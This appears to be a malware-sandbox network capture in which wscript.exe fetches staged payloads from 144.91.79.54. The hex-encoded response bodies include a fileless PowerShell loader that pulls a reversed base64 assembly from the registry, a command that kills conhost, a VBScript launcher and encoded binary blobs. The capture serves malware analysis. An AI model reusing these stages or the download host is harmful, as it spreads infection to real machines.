                                    Jan 14, 2025 08:47:15.088253021 CET192.168.2.71.1.1.10xa05fStandard query (0)time.windows.comA (IP address)IN (0x0001)false
                                    Jan 14, 2025 08:48:15.279548883 CET192.168.2.71.1.1.10x9373Standard query (0)api.ipify.orgA (IP address)IN (0x0001)false

                                    DNS Answers

                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                    Jan 14, 2025 08:47:13.866285086 CET1.1.1.1192.168.2.70x76d5No error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                    Jan 14, 2025 08:47:13.866285086 CET1.1.1.1192.168.2.70x76d5No error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                                    Jan 14, 2025 08:47:15.095026016 CET1.1.1.1192.168.2.70xa05fNo error (0)time.windows.comtwc.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                    Jan 14, 2025 08:47:42.071885109 CET1.1.1.1192.168.2.70xa381No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                    Jan 14, 2025 08:47:42.071885109 CET1.1.1.1192.168.2.70xa381No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                    Jan 14, 2025 08:48:15.286621094 CET1.1.1.1192.168.2.70x9373No error (0)api.ipify.org104.26.12.205A (IP address)IN (0x0001)false
                                    Jan 14, 2025 08:48:15.286621094 CET1.1.1.1192.168.2.70x9373No error (0)api.ipify.org172.67.74.152A (IP address)IN (0x0001)false
                                    Jan 14, 2025 08:48:15.286621094 CET1.1.1.1192.168.2.70x9373No error (0)api.ipify.org104.26.13.205A (IP address)IN (0x0001)false

                                    HTTP Request Dependency Graph

                                    • api.ipify.org
                                    • 144.91.79.54

                                    HTTP Packets

                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    0192.168.2.749699144.91.79.54804656C:\Windows\System32\wscript.exe
                                    TimestampBytes transferredDirectionData
                                    Jan 14, 2025 08:47:09.039079905 CET152OUTGET /2412/s HTTP/1.1
                                    Connection: Keep-Alive
                                    Accept: */*
                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                    Host: 144.91.79.54
                                    Jan 14, 2025 08:47:09.664688110 CET1236INHTTP/1.1 200 OK
                                    Date: Tue, 14 Jan 2025 07:47:09 GMT
                                    Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                    Last-Modified: Wed, 02 Oct 2024 01:26:13 GMT
                                    ETag: "6ab0-6237452d358f3"
                                    Accept-Ranges: bytes
                                    Content-Length: 27312
                                    Keep-Alive: timeout=5, max=100
                                    Connection: Keep-Alive
                                    Data Raw: 33 44 33 44 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 [TRUNCATED]
                                    Data Ascii: 3D3D414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414
                                    Jan 14, 2025 08:47:09.664751053 CET1236INData Raw: 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34
                                    Data Ascii: 141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141
                                    Jan 14, 2025 08:47:09.664792061 CET448INData Raw: 44 33 39 33 32 36 33 37 36 34 41 33 33 35 39 37 30 33 31 35 37 34 43 37 41 34 36 35 37 36 32 36 43 36 38 33 32 35 39 37 41 37 30 36 41 36 32 37 39 35 36 36 45 34 39 33 39 34 44 36 45 36 32 37 33 33 31 34 37 36 35 36 37 33 38 36 44 35 41 37 35 36
                                    Data Ascii: D393263764A33597031574C7A4657626C6832597A706A6279566E49394D6E627331476567386D5A756C45647A566E6330784449676F51442B3869497742585975343262705258596A6C47627742585135316B49395557626835474969416A4C7734434D75456A4939343262704E6E636C5A4849355258613035
                                    Jan 14, 2025 08:47:09.664828062 CET1236INData Raw: 33 33 31 34 37 36 35 36 37 36 42 34 38 36 32 36 39 33 31 35 37 35 41 37 41 34 45 35 38 35 39 33 38 36 46 35 31 34 34 34 42 33 30 36 37 35 30 32 46 34 39 37 39 36 33 36 43 36 43 36 45 34 39 33 39 35 35 36 44 36 32 37 36 37 38 35 37 35 39 36 42 33
                                    Data Ascii: 3314765676B48626931575A7A4E5859386F51444B3067502F4979636C6C6E4939556D62767857596B355759304E48496967544C4752565669307A5A756C475A764E6D626C4269497734534D69306A62766C326379566D6467775762343944502F75373741414141414141414141414141456736414177516344
                                    Jan 14, 2025 08:47:09.664864063 CET1236INData Raw: 37 34 44 34 31 34 31 34 34 34 31 37 39 34 31 34 31 34 44 34 31 34 35 34 34 34 31 37 39 34 31 34 31 34 44 34 31 35 31 34 37 34 31 37 33 34 32 35 31 36 31 34 31 35 35 34 38 34 31 34 33 34 32 34 31 34 31 34 31 35 35 34 37 34 31 37 34 34 32 35 31 35
                                    Data Ascii: 74D414144417941414D414544417941414D4151474173425161415548414342414141554741744251594134454173425159413447417942515A41514841754251534145414153414152414141417741674C414144417541414D41344341784141414141414175427762416B47417A426763415547415742515A
                                    Jan 14, 2025 08:47:09.664901972 CET1236INData Raw: 31 34 31 37 37 34 31 33 38 34 31 34 31 34 31 34 31 34 32 34 41 34 31 34 31 34 44 34 31 37 41 34 31 34 31 34 31 34 31 34 31 34 31 35 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34
                                    Data Ascii: 14177413841414141424A41414D417A41414141414151414141414141414141414141414141414141414167414141614141414142415141414141414141414141414141414141414141414141414167414141414141514141414141414141414141414141414141414141674141414F41414141424151414141
                                    Jan 14, 2025 08:47:09.664938927 CET1236INData Raw: 31 34 31 34 31 34 31 34 31 37 34 35 31 35 32 35 35 35 31 35 31 35 32 35 35 35 31 35 31 34 32 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 33 35 31 35 38 35 41 35 34 35 36 33 32 35 39 37 39 35 36 33 33 36
                                    Data Ascii: 141414141745152555151525551514241414141414141414141414141414351585A54563259795633627A566D556C31576130355764533579636C4E6D63313932636C4A6C4C745647647A6C33556A6B444F7755474E7A6B544D32557A593145324E3349575075563261765256656C74305970786D5931424649
                                    Jan 14, 2025 08:47:09.664973974 CET1236INData Raw: 45 37 34 34 35 34 31 34 32 36 42 34 36 34 31 34 31 34 31 36 41 34 43 37 37 33 34 34 33 34 44 37 35 36 33 35 34 34 44 34 39 34 39 35 38 35 41 36 42 37 38 35 37 36 31 33 31 34 41 35 35 35 41 36 41 34 41 35 38 36 34 37 36 34 45 35 38 35 41 35 33 35
                                    Data Ascii: E744541426B464141416A4C7734434D7563544D4949585A6B785761314A555A6A4A5864764E585A5352575A776C48563578325A75396D63304E6C4C7A78326276526C4C7A563259795633627A566D557530575A304E5865544E44414245454141416A4C7734434D7545544D4955476468784763745647563531
                                    Jan 14, 2025 08:47:09.665009975 CET552INData Raw: 46 34 35 34 37 35 31 35 31 36 36 35 33 35 39 37 37 34 31 36 42 34 39 35 32 34 31 36 46 34 39 35 32 34 36 34 37 36 33 35 31 35 39 35 33 34 35 34 31 34 42 35 33 35 35 36 38 34 32 34 38 36 37 36 37 34 35 34 32 36 37 36 39 34 35 35 36 35 39 37 37 34
                                    Data Ascii: F4547515166535977416B4952416F495246476351595345414B535568424867674542676945565977424D4952416F4952464763674F4B5564452F393150776951696754544757786C6533694141544567434541774543417745474D41415445414B535568424341774543635142413452414B51414165415141
                                    Jan 14, 2025 08:47:09.665049076 CET1236INData Raw: 31 34 31 36 37 34 44 35 31 36 41 34 31 34 42 35 32 34 31 34 32 34 31 36 37 34 32 34 46 37 37 35 32 34 31 36 37 35 31 36 37 34 31 34 46 36 42 34 39 36 37 35 33 34 39 34 31 34 39 34 38 33 34 36 37 34 34 34 46 34 39 34 31 34 31 34 36 36 42 34 39 36
                                    Data Ascii: 141674D516A414B5241424167424F775241675167414F6B496753494149483467444F494141466B4967535941424330496753495169414B4248466377434934514243415142496767444341534249414149446741434630524264517742496768454263414264436F4564436F454241414342436F4542635142
                                    Jan 14, 2025 08:47:09.670001984 CET1236INData Raw: 33 34 32 37 37 35 39 34 31 34 31 34 33 34 31 36 38 34 32 34 31 35 34 35 36 34 32 34 31 34 31 36 33 34 32 35 31 35 41 34 31 34 39 34 38 34 31 36 38 34 32 37 37 36 34 34 31 35 31 34 38 34 31 36 44 34 32 37 37 36 32 34 31 34 44 33 31 34 35 34 31 34
                                    Data Ascii: 34277594141434168424154564241416342515A4149484168427764415148416D427762414D314541417763415547416A4267634155484176427763415547415342674C4149324641415165304A585A77396D63514E335A756C47643056325535314541354A48647A6C325A6C4A464135786D59745632637A46
                                    Jan 14, 2025 08:47:09.884834051 CET152OUTGET /2412/v HTTP/1.1
                                    Connection: Keep-Alive
                                    Accept: */*
                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                    Host: 144.91.79.54
                                    Jan 14, 2025 08:47:10.070270061 CET761INHTTP/1.1 200 OK
                                    Date: Tue, 14 Jan 2025 07:47:09 GMT
                                    Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                    Last-Modified: Wed, 25 Sep 2024 15:44:42 GMT
                                    ETag: "1de-622f3802a248c"
                                    Accept-Ranges: bytes
                                    Content-Length: 478
                                    Keep-Alive: timeout=5, max=99
                                    Connection: Keep-Alive
                                    Data Raw: 37 42 35 42 37 44 34 31 37 30 37 30 34 34 36 46 36 44 36 31 36 39 36 45 37 42 35 44 37 44 33 41 33 41 34 33 37 35 37 32 37 32 36 35 36 45 37 34 34 34 36 46 36 44 36 31 36 39 36 45 32 45 34 43 36 46 36 31 36 34 37 42 32 38 37 44 35 42 34 33 36 46 36 45 37 36 36 35 37 32 37 34 37 42 35 44 37 44 33 41 33 41 34 36 37 32 36 46 36 44 34 32 36 31 37 33 36 35 33 36 33 34 35 33 37 34 37 32 36 39 36 45 36 37 37 42 32 38 37 44 37 42 32 38 37 44 32 44 36 41 36 46 36 39 36 45 32 30 37 42 32 38 37 44 34 37 36 35 37 34 32 44 34 39 37 34 36 35 36 44 35 30 37 32 36 46 37 30 36 35 37 32 37 34 37 39 32 30 32 44 34 43 36 39 37 34 36 35 37 32 36 31 36 43 35 30 36 31 37 34 36 38 32 30 32 37 34 38 34 42 34 33 35 35 33 41 35 43 35 33 36 46 36 36 37 34 37 37 36 31 37 32 36 35 35 43 37 43 37 30 36 31 37 34 36 38 37 43 32 37 32 30 32 44 34 45 36 31 36 44 36 35 32 30 32 37 37 33 32 37 37 42 32 39 37 44 32 45 37 33 32 30 37 43 32 30 34 36 36 46 37 32 34 35 36 31 36 33 36 38 32 44 34 46 36 32 36 41 36 35 36 33 37 34 32 30 37 42 [TRUNCATED]
                                    Data Ascii: 7B5B7D417070446F6D61696E7B5D7D3A3A43757272656E74446F6D61696E2E4C6F61647B287D5B436F6E766572747B5D7D3A3A46726F6D426173653634537472696E677B287D7B287D2D6A6F696E207B287D4765742D4974656D50726F7065727479202D4C69746572616C506174682027484B43553A5C536F6674776172655C7C706174687C27202D4E616D65202773277B297D2E73207C20466F72456163682D4F626A656374207B7B7D245F7B5B7D2D312E2E2D7B287D245F2E4C656E6774687B297D7B5D7D7B7D7D7B297D7B297D7B297D3B207B5B7D622E627B5D7D3A3A627B287D277C706174687C277B297D
                                    Jan 14, 2025 08:47:10.080144882 CET152OUTGET /2412/r HTTP/1.1
                                    Connection: Keep-Alive
                                    Accept: */*
                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                    Host: 144.91.79.54
                                    Jan 14, 2025 08:47:10.265604019 CET1236INHTTP/1.1 200 OK
                                    Date: Tue, 14 Jan 2025 07:47:10 GMT
                                    Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                    Last-Modified: Wed, 09 Oct 2024 05:50:42 GMT
                                    ETag: "9800-62404d5968a93"
                                    Accept-Ranges: bytes
                                    Content-Length: 38912
                                    Keep-Alive: timeout=5, max=98
                                    Connection: Keep-Alive
                                    Data Raw: 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 [TRUNCATED]
                                    Data Ascii: 00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
                                    Jan 14, 2025 08:47:11.210165977 CET153OUTGET /2412/cn HTTP/1.1
                                    Connection: Keep-Alive
                                    Accept: */*
                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                    Host: 144.91.79.54
                                    Jan 14, 2025 08:47:11.395622969 CET347INHTTP/1.1 200 OK
                                    Date: Tue, 14 Jan 2025 07:47:11 GMT
                                    Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                    Last-Modified: Sat, 09 Nov 2024 16:14:35 GMT
                                    ETag: "42-6267d29e174cb"
                                    Accept-Ranges: bytes
                                    Content-Length: 66
                                    Keep-Alive: timeout=5, max=97
                                    Connection: Keep-Alive
                                    Data Raw: 35 33 37 34 36 46 37 30 32 44 35 30 37 32 36 46 36 33 36 35 37 33 37 33 32 30 32 44 34 45 36 31 36 44 36 35 32 30 36 33 36 46 36 45 36 38 36 46 37 33 37 34 32 30 32 44 34 36 36 46 37 32 36 33 36 35
                                    Data Ascii: 53746F702D50726F63657373202D4E616D6520636F6E686F7374202D466F726365


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    1192.168.2.749700144.91.79.54804656C:\Windows\System32\wscript.exe
                                    TimestampBytes transferredDirectionData
                                    Jan 14, 2025 08:47:11.642347097 CET155OUTGET /2412/file HTTP/1.1
                                    Connection: Keep-Alive
                                    Accept: */*
                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                    Host: 144.91.79.54
                                    Jan 14, 2025 08:47:12.269232035 CET1236INHTTP/1.1 200 OK
                                    Date: Tue, 14 Jan 2025 07:47:12 GMT
                                    Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                    Last-Modified: Fri, 10 Jan 2025 19:46:38 GMT
                                    ETag: "165a-62b5f5a682598"
                                    Accept-Ranges: bytes
                                    Content-Length: 5722
                                    Keep-Alive: timeout=5, max=100
                                    Connection: Keep-Alive
                                    Data Raw: 34 46 37 30 37 34 36 39 36 46 36 45 32 30 34 35 37 38 37 30 36 43 36 39 36 33 36 39 37 34 30 41 30 41 32 37 32 30 34 45 36 46 36 44 36 32 37 32 36 35 32 30 36 34 37 35 32 30 37 30 37 32 36 46 36 41 36 35 37 34 33 41 32 30 37 43 37 30 36 31 37 34 36 38 37 43 30 41 32 37 32 30 35 36 36 31 37 32 36 39 36 31 36 32 36 43 36 35 37 33 32 30 36 37 36 43 36 46 36 32 36 31 36 43 36 35 37 33 30 41 34 34 36 39 36 44 32 30 35 33 36 38 36 35 36 43 36 43 34 46 36 32 36 41 36 35 37 34 32 43 32 30 34 34 36 46 37 33 37 33 36 39 36 35 37 32 35 37 36 39 36 45 36 34 36 46 37 37 37 33 32 43 32 30 34 33 36 46 36 44 37 30 37 34 36 35 37 35 37 32 34 39 37 34 36 35 37 32 36 31 37 34 36 39 36 46 36 45 37 33 30 41 35 33 36 35 37 34 32 30 35 33 36 38 36 35 36 43 36 43 34 46 36 32 36 41 36 35 37 34 32 30 33 44 32 30 34 33 37 32 36 35 36 31 37 34 36 35 34 46 36 32 36 41 36 35 36 33 37 34 32 38 32 32 35 37 35 33 36 33 37 32 36 39 37 30 37 34 32 45 35 33 36 38 36 35 36 43 36 43 32 32 32 39 30 41 34 34 36 46 37 33 37 33 36 39 36 35 [TRUNCATED]
                                    Data Ascii: 4F7074696F6E204578706C696369740A0A27204E6F6D6272652064752070726F6A65743A207C706174687C0A27205661726961626C657320676C6F62616C65730A44696D205368656C6C4F626A65742C20446F737369657257696E646F77732C20436F6D7074657572497465726174696F6E730A536574205368656C6C4F626A6574203D204372656174654F626A6563742822575363726970742E5368656C6C22290A446F737369657257696E646F7773203D205368656C6C4F626A65742E457870616E64456E7669726F6E6D656E74537472696E677328222577696E6469722522290A0A272050726F6772616D6D65207072696E636970616C0A43616C6C20496E697469616C69736174696F6E28290A43616C6C20457865637574696F6E5072696E636970616C6528290A0A2720496E697469616C69736174696F6E2064657320706172616D65747265732064752070726F6772616D6D650A53756220496E697469616C69736174696F6E28290A20202020436F6D7074657572497465726174696F6E73203D20300A456E64205375620A0A2720526F7574696E65207072696E636970616C6520706F7572206765726572206C27657865637574696F6E2064752070726F6772616D6D650A53756220457865637574696F6E5072
                                    Jan 14, 2025 08:47:12.269288063 CET1236INData Raw: 36 39 36 45 36 33 36 39 37 30 36 31 36 43 36 35 32 38 32 39 30 41 32 30 32 30 32 30 32 30 34 34 36 46 32 30 35 37 36 38 36 39 36 43 36 35 32 30 34 33 36 46 36 44 37 30 37 34 36 35 37 35 37 32 34 39 37 34 36 35 37 32 36 31 37 34 36 39 36 46 36 45
                                    Data Ascii: 696E636970616C6528290A20202020446F205768696C6520436F6D7074657572497465726174696F6E73203C2031303030302027204C696D697465206427697465726174696F6E7320706F75722064656D6F6E7374726174696F6E0A202020202020202043616C6C205665726966696572457444656D6172726
                                    Jan 14, 2025 08:47:12.269324064 CET448INData Raw: 32 30 35 33 37 35 36 32 30 41 30 39 30 39 34 35 36 45 36 34 32 30 34 39 36 36 30 41 30 39 30 39 30 41 30 39 30 39 30 41 30 39 30 39 34 33 36 31 36 43 36 43 32 30 34 34 36 35 36 44 36 31 37 32 37 32 36 35 37 32 35 30 36 46 37 37 36 35 37 32 35 33
                                    Data Ascii: 205375620A0909456E642049660A09090A09090A090943616C6C2044656D6172726572506F7765725368656C6C28290A20202020202020200A202020202020202044696D2050726F63657373506F7765725368656C6C0A20202020202020205365742050726F63657373506F7765725368656C6C203D2054726
                                    Jan 14, 2025 08:47:12.269359112 CET1236INData Raw: 36 33 37 35 37 34 36 35 37 32 34 33 36 46 36 44 36 44 36 31 36 45 36 34 36 35 37 33 35 30 36 46 37 37 36 35 37 32 35 33 36 38 36 35 36 43 36 43 32 38 35 30 37 32 36 46 36 33 36 35 37 33 37 33 35 30 36 46 37 37 36 35 37 32 35 33 36 38 36 35 36 43
                                    Data Ascii: 6375746572436F6D6D616E646573506F7765725368656C6C2850726F63657373506F7765725368656C6C290A2020202020202020456E642049660A09090A09090A20202020456E642049660A456E64205375620A0A2720466F6E6374696F6E20706F757220766572696669657220736920756E2070726F63657
                                    Jan 14, 2025 08:47:12.269395113 CET1236INData Raw: 34 36 36 46 36 45 36 33 37 34 36 39 36 46 36 45 32 30 37 30 36 46 37 35 37 32 32 30 37 34 37 32 36 46 37 35 37 36 36 35 37 32 32 30 37 35 36 45 32 30 37 30 37 32 36 46 36 33 36 35 37 33 37 33 37 35 37 33 32 30 35 30 36 46 37 37 36 35 37 32 35 33
                                    Data Ascii: 466F6E6374696F6E20706F75722074726F7576657220756E2070726F63657373757320506F7765725368656C6C20656E20636F757273206427657865637574696F6E0A46756E6374696F6E2054726F7576657250726F63657373506F7765725368656C6C28290A2020202044696D204C6973746550726F63657
                                    Jan 14, 2025 08:47:12.269433022 CET616INData Raw: 36 43 32 39 30 41 32 30 32 30 32 30 32 30 35 37 36 39 37 34 36 38 32 30 35 33 36 38 36 35 36 43 36 43 34 46 36 32 36 41 36 35 37 34 30 41 32 30 32 30 32 30 32 30 32 30 32 30 32 30 32 30 32 45 34 31 37 30 37 30 34 31 36 33 37 34 36 39 37 36 36 31
                                    Data Ascii: 6C290A2020202057697468205368656C6C4F626A65740A20202020202020202E41707041637469766174652050726F63657373506F7765725368656C6C2E50726F6365737349640A20202020202020202E53656E644B657973202E526567526561642822484B45595F43555252454E545F555345525C536F667
                                    Jan 14, 2025 08:47:12.295655966 CET175OUTGET /2412/dl2xgIbUbOo3ZqLShxJX.txt HTTP/1.1
                                    Connection: Keep-Alive
                                    Accept: */*
                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                    Host: 144.91.79.54
                                    Jan 14, 2025 08:47:12.488275051 CET1236INHTTP/1.1 200 OK
                                    Date: Tue, 14 Jan 2025 07:47:12 GMT
                                    Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                    Last-Modified: Tue, 14 Jan 2025 02:32:27 GMT
                                    ETag: "75400-62ba15f35a05a"
                                    Accept-Ranges: bytes
                                    Content-Length: 480256
                                    Keep-Alive: timeout=5, max=99
                                    Connection: Keep-Alive
                                    Content-Type: text/plain
                                    Data Raw: 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 [TRUNCATED]
                                    Data Ascii: 0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
                                    Jan 14, 2025 08:47:12.488329887 CET1236INData Raw: 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30
                                    Data Ascii: 0000000000000000000000000000000000000000000000000000000000000000000000000000000000F303000000C000300B00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
                                    Jan 14, 2025 08:47:12.488367081 CET448INData Raw: 31 33 36 37 45 32 44 36 33 37 31 36 41 33 44 36 46 36 33 36 44 32 34 37 36 36 46 36 33 37 46 36 32 37 33 36 39 36 44 36 44 32 33 37 31 36 44 36 35 36 38 36 33 36 33 37 41 33 45 36 32 37 35 37 32 32 44 33 33 37 45 36 43 36 44 36 38 37 30 32 39 37
                                    Data Ascii: 1367E2D63716A3D6F636D24766F637F6273696D6D23716D656863637A3E6275722D337E6C6D6870297C626D656373716C3A0D0E3F32237569722D356E6F6C61646E6164737022283D264455522D376E69646F636E656022203E21322D3E6F6963727566702C6D687F3C3FBBBFE0000000300E2000300E200030
                                    Jan 14, 2025 08:47:12.488403082 CET1236INData Raw: 38 37 30 30 35 36 30 30 45 32 30 30 36 33 30 30 31 33 30 30 31 33 30 30 32 36 30 30 33 33 30 30 33 33 30 30 36 33 30 30 33 33 30 30 31 33 30 30 36 33 30 30 34 33 30 30 30 33 30 30 44 32 30 30 33 33 30 30 35 33 30 30 39 33 30 30 31 36 30 30 44 32
                                    Data Ascii: 87005600E200630013001300260033003300630033001300630043000300D2003300530093001600D2001300930063004300D2004600560056004600D2000300030036002300830003002300230000005600D6001600E6005600C60096006400C6001600E6009600760096002700F40010009200C7000000020
                                    Jan 14, 2025 08:47:12.488437891 CET1236INData Raw: 30 30 30 30 30 39 30 30 30 30 30 30 30 30 30 30 31 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 38 30 30 30 30 38 36 30 30 30 30 30 30 31 30 30 30 31 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30
                                    Data Ascii: 000009000000000010000000000000000000000000000008000086000000100010000000000000000000000000000000000008000000000010000000000000000000000000000008000083000000100010000000000000000000000000000008000005000000810800000200000001002000000000000000000
                                    Jan 14, 2025 08:47:12.488472939 CET1236INData Raw: 45 30 38 30 32 30 31 36 31 31 35 31 45 30 38 30 32 30 44 35 32 31 35 31 31 33 31 38 32 31 45 30 31 33 31 38 32 31 31 33 31 38 32 31 31 30 44 34 32 31 35 31 46 30 37 30 41 33 38 30 35 30 44 31 38 31 38 31 41 30 32 30 38 31 38 31 38 31 43 45 31 38
                                    Data Ascii: E08020161151E08020D52151131821E013182113182110D42151F070A38050D18181A020818181CE1811A070F0804D18218050D1805070A0804D182190908E18215070B04D182110D42151708050D1CC1811904E18215070C0901070308030D150D1CC181150D190900E18218070117050D1100050A05711100


